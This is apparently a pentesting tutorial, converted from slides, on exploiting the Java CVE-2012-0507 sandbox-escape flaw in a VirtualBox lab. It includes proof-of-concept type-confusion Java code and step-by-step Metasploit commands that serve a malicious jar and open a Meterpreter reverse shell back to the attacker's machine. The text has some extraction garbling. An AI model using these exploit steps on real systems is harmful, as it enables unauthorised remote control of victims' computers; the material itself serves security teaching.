Post on 27-May-2015
description
EXPLOITING JAVA VULNERABILITY (CVE-2012-0507)
USING METASPLOIT
PenTesting Tutorials:
www.BreakTheSecurity.com
Introduction to java AtomicReferenceArray
vulnerability
About CVE-2012-0507
A vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. The vulnerability found by Jeroen Frijters
A malicious Java application or applet could use
this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.
Problematic code
public AtomicReferenceArray(E[] array) {
this.array = array.clone();
}
Violating the Type Safety
import java.util.concurrent.atomic.*;class first{}public violateClass{public static void main(String a[]){Object obj=new first();AtomicReferenceArray r=new AtomicReferenceArray(new
first[1]);obj="Hell";r.set(0,obj);first f=(first)r.get(0);}}
Exploiting
By manually constructing a serialized object graph you can stick any array you want into an AtomicReferenceArray instance and then use the AtomicReferenceArray.set() method to write an arbitrary reference to violate type safety.
Arbitrary reference to violate type safety. import java.io.*;
import java.util.concurrent.atomic.*;
class Union1 { }class Union2 { }
public class test{ static byte[] buf = new byte[] { -84, -19, 0, 5, 117, 114, 0, 19, 91, 76, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 79, 98, 106, 101, 99, 116, 59, -112, -50, 88, -97, 16, 115, 41, 108, 2, 0, 0, 120, 112, 0, 0, 0, 2, 117, 114, 0, 9, 91, 76, 85, 110, 105, 111, 110, 49, 59, -2, 44, -108, 17, -120, -74, -27, -1, 2, 0, 0, 120, 112, 0, 0, 0, 1, 112, 115, 114, 0, 48, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 99, 111, 110, 99, 117, 114, 114, 101, 110, 116, 46, 97, 116, 111, 109, 105, 99, 46, 65, 116, 111, 109, 105, 99, 82, 101, 102, 101, 114, 101, 110, 99, 101, 65, 114, 114, 97, 121, -87, -46, -34, -95, -66, 101, 96, 12, 2, 0, 1, 91, 0, 5, 97, 114, 114, 97, 121, 116, 0, 19, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 120, 112, 113, 0, 126, 0, 3 };
public static void main(String[] args) throws Throwable { ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(buf)); Object[] arr = (Object[])ois.readObject(); Union1[] u1 = (Union1[])arr[0]; AtomicReferenceArray ara = (AtomicReferenceArray)arr[1]; ara.set(0, new Union2()); System.out.println(u1[0]); }}
Exploiting this vulnerability using
metasploit
Requirements:
VirtualBox Target OS(windows,...) PenTesting Distro(Backtrack ) JRE 6(unpatched version)
Preparing Target Machine Start the "Target" Machine.
Install the JRE 6.(I have already installed the JRE)
Preparing Attacker Machine Now, start the BT5. Open the Terminal and Type "msfupdate".
This will update the Metasploit Framework(MSF) with the latest exploits.
Open the Terminal and type msfconsole Now type :
use exploit/multi/browser/java_atomicreferencearray The above command will use the
java_atomicreferencearray.rb module for the attack.
Now type "show options" to display the settings available and/or required for this specific module.
set SRVPORT 80 set URIPATH / set SRVHOST [Backtrack_ip]
How to get IP of Backtrack:
○ open the Terminal ○ Type ifconfig ○ It will display the IP
Payload
Type "show payloads“ . This will displays the list of payloads available to use
I am going to use the reverse_tcp payload. This payload will get reverse tcp connection from the Target to our machine.
Type set payload java/meterpreter/reverse_tcp
In order to get reverse connection, we have to set Backtrack IP in the LHOST.
So type the following command: set LHOST [Backtrack_IP]
EXPLOITAre you ready?! Let us
We have setup everything needed for the Exploit. So it is time to break into the Target machine.
Type "exploit" in the msfconsole.
This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.102)
Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.
Victim side We have set up our exploit. Let us see what happen
when our victim open our url.
Go to the “Target” VM. Open the Firefox Enter the url you got from the you got from the metasploit
exploit:Eg: http://192.168.56.102
No need to care about the ‘80’ in the URL becoz It is default port
It loads nothing
but in background : The Backtrack sends a jar file and
exploit the vulnerability. After successful exploit, it brings control
to Backtrack
Now type "sessions“ in the metasploit console, this will display the list of active sessions(victims list)
Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter
Meterpreter will help you to interact/control with the Target
Exploited in the Wild
On April 2012, The research conducted by Dr.Web determined that more than 600,000 Mac computers are infected with BackDoor.Flashback botnet.
Included in Exploit kits
I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability.
I hope this will help you to get into the PenTesting world..!
For more PenTesting Tutorials :www.BreakTheSecurity.com